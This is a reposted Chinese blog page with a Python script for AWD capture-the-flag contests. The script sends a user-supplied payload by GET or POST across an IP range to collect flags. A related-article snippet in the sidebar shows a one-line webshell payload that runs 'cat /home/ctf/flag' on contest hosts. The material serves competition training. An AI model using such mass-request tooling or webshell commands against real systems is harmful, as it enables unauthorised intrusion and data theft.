AWD批量Get_flag

最新推荐文章于 2024-05-03 23:48:32 发布
最新推荐文章于 2024-05-03 23:48:32 发布
阅读量1.3k 收藏 6
点赞数 1
文章标签: python shell
原文链接:http://www.cnblogs.com/tide-sec/p/9132171.html
版权

  

#!/usr/bin/env python
# encoding: utf-8
from IPy import IP
import requests

#批量Get_Flag


# IP地址处理,调用方法IPs("192.168.10.0/24")或IPs("192.168.10.0.-20"),返回一个数组
def IPs(ip):
    IPS = []
    s1 = "/"
    s2 = "-"
    if ip.find(s1) > 0:
        ip1 = IP(ip)
        for i in ip1:
            IPS.append(i)
    elif (str(ip).find(s2)) > 0:
        for i in range(int(str(ip)[str(ip).rfind('.') + 1:str(ip).rfind('-')]),
                       int(str(ip)[str(ip).rfind('-') + 1:]) + 1):
            IPS.append(str(ip)[:str(ip).rfind('.') + 1] + str(i))
    return IPS
# for i in IPs("192.168.1.0-12"):
#     print(i)
headers = {
    'Accept': '*/*',
    'Referer': 'https://www.baidu.com',
    'User-Agent': 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.1; ',
    'Cache-Control': 'no-cache'
}


def get_Requests(ip, payload):
    url = 'http://' + str(ip) + '/' + payload
    try:
        get_Flag = requests.get(url, headers=headers, timeout=3)
        return get_Flag.text
    except requests.exceptions.ConnectTimeout:
        print("Connect Timeout")


def post_Requests(ip, payload, post_data):
    url = 'http://' + ip + '/' + payload
    try:
        get_Flag = requests.post(url,
                                 headers=headers,
                                 data=post_data,
                                 timeout=3)
        return get_Flag.text
    except requests.exceptions.ConnectTimeout:
        print("Connect Timeout")


def main():
    print('#get_Flag V1.0')
    ip = input('Please enter the IP range >>>')
    num = int(input('Please select request method 1 = get 2 = post >>>'))
    payload = input('Please enter the payload')
    if num == 2:
        post_data = input('Please enter post_data')
        for i in IPs(ip):
            print(post_Requests(i, payload, post_data))
    else:
        for i in IPs(ip):
            print(get_Requests(i, payload))


if __name__ == '__main__':
    main()

  

转载于:https://www.cnblogs.com/tide-sec/p/9132171.html

weixin_30776545
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
AWD攻防中读取flag批量脚本
09-05
AWD攻防中读取flag批量脚本,可能需要自行修改下
awd-python批量拿flag批量提交
weixin_46079186的博客
06-26 5703
代码仅供参考 import requests import re data = { '123':"system('cat+/home/ctf/flag');" # 一句话木马 } list = [] def shell(): for i in range(1,255): try: io = requests.get("http://192-168-1-" + str(i) + ".awd.bugku.cn/e/search/result/
红蓝对抗-AWD全流程攻略05(批量获取flag
最新发布
m0_67189356的博客
05-03 623
通过自动化实现批量获取flag
AWD自动提交flag脚本
09-01
AWD自动提交flag脚本
AWD攻击脚本-多线程-批量-打全场-保存flag
weixin_44922881的博客
08-22 1691
多线程批量attack全场,并输出、保存flag 一、针对文件包含漏洞的脚本 #!/usr/bin/env python # encoding: utf-8 import requests import urllib import time import threading import base64 #批量Get_Flag def init1(): global headers123 headers1243 = { 'Accept': '*/*', ...
awd赛题的flag是什么意思_记一次AWD自动获取flag并提交
weixin_39605578的博客
01-31 2179
背景近期部门内搭建了攻防实验平台供大家练习,周末组织了一波AWD练习,之前都是做渗透测试比较多,加之题目比较简单,找到漏洞getshell拿flag都没问题,只不过如果没找到突破口flag都要手动提交的话,拿分会慢很多。在过程中发现其实除了getshell后再服务器根目录/下读到flag,其实还可以靶机网站中还存在一个任意文件读取漏洞,那这样写脚本自动flag就简单得多了自动提交flag的脚本#!...
AWD.rar_AWD
09-24
在Windows调试中,"AWD"(Advanced Windows Debugging)通常指的是书中所涵盖的高级调试技巧和策略。这些技巧包括但不限于: 1. **调试基础知识**:理解调试器的工作原理,学习使用如WinDbg这样的调试工具,熟悉...
AWD_CTF_Platform:一个简单的AWD训练平台
05-13
启动10个实例,以及check和flag服务。 stop_clean.py python stop_clean.py 暂停所有服务,并删除临时文件 注意,这里会删除所有现运行的容器,请谨慎使用。 pass.txt 存储队伍用户名密码,以及ssh、web端口 team01 ...
awd比赛可用的自动化获取flag脚本。.zip
09-30
awd比赛可用的自动化获取flag脚本。
awd赛题的flag是什么意思_CTF线下赛AWD模式下的生存技巧
weixin_33586720的博客
12-24 888
作者:Veneno@Nu1L稿费:200RMB投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿Hello,大家好,我是Nu1L战队队长Veneno,通过这篇文章说一下关于CTF线下赛的AWD模式(当然也有一些比赛是沙盒模式),以及身为一只Web狗的你如何在各位大佬们的手下存活:)可能没有技术干货,大家勿喷:)1-何为AWDAttack With Defence,简而言之就是你既...
自动提交flag到指定服务器python脚本
05-12
自动从txt读取flag并提交指定平台python脚本,AWD比赛专用,可以自定义内容,批量提交等,确保速度
【网络安全】CTF-AWD入门手册
2201_75857562的博客
02-02 2014
AWD赛制是一种网络安全竞赛的赛制。
ctf之python脚本获取flag
芥子
01-19 2万+
题目:GetFlag解题链接:http://106.75.26.211:2222访问链接页面显示如下:在页面提示中captcha通过md5加密后的前六位是b8cda8,说明需要通过脚本来破解:脚本如下:运行结果:这里由于不知道登录用户和密码,想到用用SQL注入的万能密码尝试一下:admin' or '1'='1登录后页面显示如下:访问三个文件都需要下载:在a.php里面提示:提示访问根目录:查看源
awd比赛常用命令行及自动化脚本
Peanuts
10-22 9063
_Author_ = Peanuts 最近是要打第二次awd,总结一下免得自己到时候手忙脚乱
awd批量脚本 pwn_北极星杯 awd复现
weixin_39811101的博客
01-12 947
北极星杯 awd复现服务器共有3个web和一个pwnweb11,down下web1的源码,使用D盾扫描:2,漏洞1:发现三个冰蝎的木马,和一个一句话木马冰蝎的后门需要使用冰蝎的客户端进行连接:如图:一句话木马直接使用菜刀或蚁剑连接即可:3,漏洞2:sqlhelper.php的反序列化漏洞:构造payload:class A{public $name;public $male;function __...
CTF线下AWD攻防模式的准备工作及起手式
热门推荐
郁离歌丶的博客
05-10 8万+
作为大一萌新我并没有打过AWD,可能我做梦都没有想到人生的第一场AWD是DEFCON CHINA吧~(滑稽我自己在服务器上搭了一个cms来模拟AWD场景。0X01 改ssh密码官方在给出服务器密码时,很有可能是默认的,需要赶快修改自己的密码并尝试能不能登陆别人的靶机,搞波事情嘿嘿嘿~0X02 dump源码首先可能没有给源码,需要自己把源码全dump下来。1.使用XFTP或者FileZilla Cl...
awd 批量获取flag
09-25
awd(Attack-Defence,攻击与防守)是一种网络安全竞赛形式,参赛者需要在拥有相同的漏洞环境中,互相攻击对方的系统,同时保护自己的系统免受攻击。比赛的目标是尽可能获取对方系统中的标志性 flag。 在awd中,批量获取flag是指通过某种方法快速获取多个flag的行为。然而,批量获取flag是不被鼓励且违反竞赛规则的行为,因为它破坏了竞赛的公平性和技术竞争的原则。 竞赛组织者会采取一系列的措施防止批量获取flag的行为: 1. 漏洞环境的安全性:竞赛组织者会尽力确保漏洞环境的安全性,修复已知的漏洞并设置有效的防御机制,以防止参赛者通过简单的手法获取flag。 2. Flag的保护:竞赛组织者会对flag进行加密或隐藏,并设置多重保护措施。只有通过特定漏洞利用或完成特定任务的参赛者才能获取flag,从而增加了获取flag的难度。 3. 监控机制:竞赛组织者会设置监控系统,对参赛者的行为进行实时跟踪和分析。如果发现异常的获取flag行为,组织者将采取相应措施,并有权取消参赛者的资格。 总体而言,awd竞赛强调的是技术实力和攻防对抗的能力,追求公平竞争和攻击与防御技巧的提升。尝试批量获取flag不仅违背了竞赛规则,还会损害awd竞赛的精神和目的。因此,参赛者应该遵守竞赛规则,以合法的方式争取获取flag,并积极参与竞赛的学习和交流过程,提升自身的技术实力。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值